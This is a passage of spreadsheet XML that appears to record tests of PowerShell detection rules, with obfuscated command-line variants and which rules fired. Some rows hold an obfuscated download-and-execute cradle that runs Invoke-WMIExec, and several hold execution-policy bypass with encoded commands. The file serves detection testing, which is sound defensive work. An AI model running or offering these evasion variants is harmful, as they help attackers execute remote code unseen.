    </row>
    <row r="3186" ht="15.75" customHeight="1" s="42">
      <c r="A3186" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3186" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_cradle_obfuscated</t>
        </is>
      </c>
      <c r="C3186" s="43" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell OneLiner Execution</t>
        </is>
      </c>
      <c r="D3186" s="43" t="inlineStr">
        <is>
          <t>44e24481-6202-4c62-9127-5a0ae8e3fe3d</t>
        </is>
      </c>
      <c r="E3186" s="43" t="inlineStr">
        <is>
          <t>powershell -"nop" -Noni -ExecutionPolicy bypass -"w" h -C "$u=('http://localhost:1337/'|%{(IRM $*)});&amp;(''.SubString.ToString()[67,72,64]-Join'')($u); Import-Module C:\Users\EXAMPLE\Invoke-WMIExec.ps1; Invoke-WMIExec"</t>
        </is>
      </c>
      <c r="F3186" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3186" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3186" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3186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186" s="43" t="n"/>
      <c r="K3186" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3187" ht="15.75" customHeight="1" s="42">
      <c r="A3187" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3187" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_cradle_obfuscated</t>
        </is>
      </c>
      <c r="C3187" s="43" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell OneLiner Execution</t>
        </is>
      </c>
      <c r="D3187" s="43" t="inlineStr">
        <is>
          <t>44e24481-6202-4c62-9127-5a0ae8e3fe3d</t>
        </is>
      </c>
      <c r="E3187" s="43" t="inlineStr">
        <is>
          <t>powershell -NOp -noni -Ep bypass -"w" h -c "$u=('http://localhost:1337/'|%{(IRM $*)});&amp;(''.SubString.ToString()[67,72,64]-Join'')($u); Import-Module C:\Users\EXAMPLE\Invoke-WMIExec.ps1; Invoke-WMIExec"</t>
        </is>
      </c>
      <c r="F3187" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3187" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3187" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3187" s="43" t="inlineStr">
        <is>
          <t>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3187" s="43" t="n"/>
      <c r="K3187" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3188" ht="15.75" customHeight="1" s="42">
      <c r="A3188" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3188" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_cradle_obfuscated</t>
        </is>
      </c>
      <c r="C3188" s="43" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell OneLiner Execution</t>
        </is>
      </c>
      <c r="D3188" s="43" t="inlineStr">
        <is>
          <t>44e24481-6202-4c62-9127-5a0ae8e3fe3d</t>
        </is>
      </c>
      <c r="E3188" s="43" t="inlineStr">
        <is>
          <t>powershell -NoProfile -noNi -ExecutionPolicy bypass /"w" h -C "$u=('http://localhost:1337/'|%{(IRM $*)});&amp;(''.SubString.ToString()[67,72,64]-Join'')($u); Import-Module C:\Users\EXAMPLE\Invoke-WMIExec.ps1; Invoke-WMIExec"</t>
        </is>
      </c>
      <c r="F3188" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3188" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3188" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3188" s="43" t="inlineStr">
        <is>
          <t>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3188" s="43" t="n"/>
      <c r="K3188" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3189" ht="15.75" customHeight="1" s="42">
      <c r="A3189" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3189" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C3189" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D3189" s="43" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E3189" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('V3JpdGUtSG9zdCAiSGVsbG8i')) | IEX"</t>
        </is>
      </c>
      <c r="F3189" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3189" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3189" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3189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3189" s="43" t="n"/>
      <c r="K3189" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3190" ht="15.75" customHeight="1" s="42">
      <c r="A3190" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3190" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C3190" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D3190" s="43" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E3190" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('V3JpdGUtSG9zdCAiSGVsbG8i')) | IEX"</t>
        </is>
      </c>
      <c r="F3190" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3190" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3190" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3190" s="43" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Suspicious PowerShell IEX Execution Patterns (09576804-7a05-458e-a817-eb718ca91f54); Suspicious PowerShell IEX Execution Patterns (09576804-7a05-458e-a817-eb718ca91f54)</t>
        </is>
      </c>
      <c r="J3190" s="43" t="n"/>
      <c r="K3190" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3191" ht="15.75" customHeight="1" s="42">
      <c r="A3191" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3191" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C3191" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D3191" s="43" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E3191" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -EncodedCommand V3JpdGUtSDBzdCAiQnlwYXNzZWQi</t>
        </is>
      </c>
      <c r="F3191" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3191" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3191" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3191" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J3191" s="43" t="n"/>
      <c r="K3191" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3192" ht="15.75" customHeight="1" s="42">
      <c r="A3192" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3192" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C3192" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D3192" s="43" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E3192" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -encODedcommAnd V3JpdGUtSDBzdCAiQnlwYXNzZWQi</t>
        </is>
      </c>
      <c r="F3192" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3192" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3192" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3192" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J3192" s="43" t="n"/>
      <c r="K3192" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3193" ht="15.75" customHeight="1" s="42">
      <c r="A3193" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3193" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C3193" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D3193" s="43" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E3193" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -enc V3JpdGUtSDBzdCAiQnlwYXNzZWQi</t>
        </is>
      </c>
      <c r="F3193" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3193" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3193" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3193" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J3193" s="43" t="n"/>
      <c r="K3193" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3194" ht="15.75" customHeight="1" s="42">
      <c r="A3194" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3194" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C3194" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D3194" s="43" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E3194" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -exECUTIonPOLIcY Bypass -enc V3JpdGUtSDBzdCAiQnlwYXNzZWQi</t>
        </is>
      </c>
      <c r="F3194" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3194" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3194" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3194" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J3194" s="43" t="n"/>
      <c r="K3194" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3195" ht="15.75" customHeight="1" s="42">
      <c r="A3195" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3195" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C3195" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D3195" s="43" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E3195" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"ExecutionPolicy" Bypass -enc V3JpdGUtSDBzdCAiQnlwYXNzZWQi</t>
        </is>
      </c>
      <c r="F3195" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3195" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3195" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3195" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J3195" s="43" t="n"/>
      <c r="K3195" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3196" ht="15.75" customHeight="1" s="42">
      <c r="A3196" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3196" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C3196" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D3196" s="43" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E3196" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExEcuTiOnPOLiCY Bypass /"EncodedCommand" V3JpdGUtSDBzdCAiQnlwYXNzZWQi</t>
        </is>
      </c>
      <c r="F3196" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3196" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3196" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3196" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J3196" s="43" t="n"/>
      <c r="K3196" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3197" ht="15.75" customHeight="1" s="42">
      <c r="A3197" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3197" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C3197" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D3197" s="43" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E3197" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -EXeCutiONPolICY Bypass -enc V3JpdGUtSDBzdCAiQnlwYXNzZWQi</t>
        </is>
      </c>
      <c r="F3197" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3197" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3197" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3197" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J3197" s="43" t="n"/>
      <c r="K3197" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3198" ht="15.75" customHeight="1" s="42">
      <c r="A3198" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3198" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C3198" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D3198" s="43" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E3198" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"ExecutionPolicy" Bypass /"EncodedCommand" V3JpdGUtSDBzdCAiQnlwYXNzZWQi</t>
        </is>
      </c>
      <c r="F3198" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3198" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3198" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3198" s="43" t="n"/>
      <c r="J3198" s="43" t="n"/>
      <c r="K3198" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3199" ht="15.75" customHeight="1" s="42">
      <c r="A3199" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3199" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C3199" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D3199" s="43" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E3199" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass /"EncodedCommand" V3JpdGUtSDBzdCAiQnlwYXNzZWQi</t>
        </is>
      </c>
      <c r="F3199" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3199" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3199" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3199" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J3199" s="43" t="n"/>
      <c r="K3199" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3200" ht="15.75" customHeight="1" s="42">
      <c r="A3200" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3200" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C3200" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D3200" s="43" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E3200" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -EncodeDcomMAND V3JpdGUtSDBzdCAiQnlwYXNzZWQi</t>
        </is>
      </c>
      <c r="F3200" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3200" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3200" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3200" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J3200" s="43" t="n"/>
      <c r="K3200" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3201" ht="15.75" customHeight="1" s="42">
      <c r="A3201" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3201" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C3201" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D3201" s="43" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E3201" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -exEcuTIonpoLIcy Bypass -enc V3JpdGUtSDBzdCAiQnlwYXNzZWQi</t>
        </is>
      </c>
      <c r="F3201" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3201" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3201" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3201" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J3201" s="43" t="n"/>
      <c r="K3201" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3202" ht="15.75" customHeight="1" s="42">
      <c r="A3202" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3202" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C3202" s="43" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D3202" s="43" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E3202" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "$method = 'FromBase' + '64String'; [Convert]::$method('SGVsbG8gV29ybGQ=')"</t>
        </is>
      </c>
      <c r="F3202" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3202" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3202" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3202" s="43" t="n"/>
      <c r="J3202" s="43" t="n"/>
      <c r="K3202" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3203" ht="15.75" customHeight="1" s="42">
      <c r="A3203" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3203" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C3203" s="43" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D3203" s="43" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E3203" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$method = 'FromBase' + '64String'; [Convert]::$method('SGVsbG8gV29ybGQ=')"</t>
        </is>
      </c>
      <c r="F3203" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3203" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3203" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3203" s="43" t="n"/>
      <c r="J3203" s="43" t="n"/>
      <c r="K3203" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3204" ht="15.75" customHeight="1" s="42">
      <c r="A3204" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3204" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C3204" s="43" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D3204" s="43" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E3204" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"EncodedCommand" UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAGMAYQBsAGMALgBlAHgAZQA=</t>
        </is>
      </c>
      <c r="F3204" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3204" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3204" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3204" s="43" t="n"/>
      <c r="J3204" s="43" t="n"/>
      <c r="K3204" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3205" ht="15.75" customHeight="1" s="42">
      <c r="A3205" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3205" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C3205" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D3205" s="43" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E3205" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Write-Host ([char] 0x41)"</t>
        </is>
      </c>
      <c r="F3205" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3205" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3205" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3205" s="43" t="n"/>
      <c r="J3205" s="43" t="n"/>
      <c r="K3205" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3206" ht="15.75" customHeight="1" s="42">
      <c r="A3206" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3206" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C3206" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D3206" s="43" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E3206" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Write-Host ([char]65 + [char]66)"</t>
        </is>
      </c>
      <c r="F3206" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3206" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3206" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3206" s="43" t="n"/>
      <c r="J3206" s="43" t="n"/>
      <c r="K3206" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3207" ht="15.75" customHeight="1" s="42">
      <c r="A3207" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3207" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C3207" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D3207" s="43" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E3207" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Write-Host ([Convert]::ToChar(0x41))"</t>
        </is>
      </c>
      <c r="F3207" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3207" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3207" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3207" s="43" t="n"/>
      <c r="J3207" s="43" t="n"/>
      <c r="K3207" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3208" ht="15.75" customHeight="1" s="42">
      <c r="A3208" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3208" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C3208" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D3208" s="43" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E3208" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Write-Host ([Convert]::ToChar(0x41))"</t>
        </is>
      </c>
      <c r="F3208" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3208" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3208" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3208" s="43" t="n"/>
      <c r="J3208" s="43" t="n"/>
      <c r="K3208" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3209" ht="15.75" customHeight="1" s="42">
      <c r="A3209" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3209" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C3209" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D3209" s="43" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E3209" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Write-Host ([char]65)"</t>
        </is>
      </c>
      <c r="F3209" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3209" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3209" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3209" s="43" t="n"/>
      <c r="J3209" s="43" t="n"/>
      <c r="K3209" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3210" ht="15.75" customHeight="1" s="42">
      <c r="A3210" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3210" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C3210" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D3210" s="43" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E3210" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Write-Host ([System.Char]0x41)"</t>
        </is>
      </c>
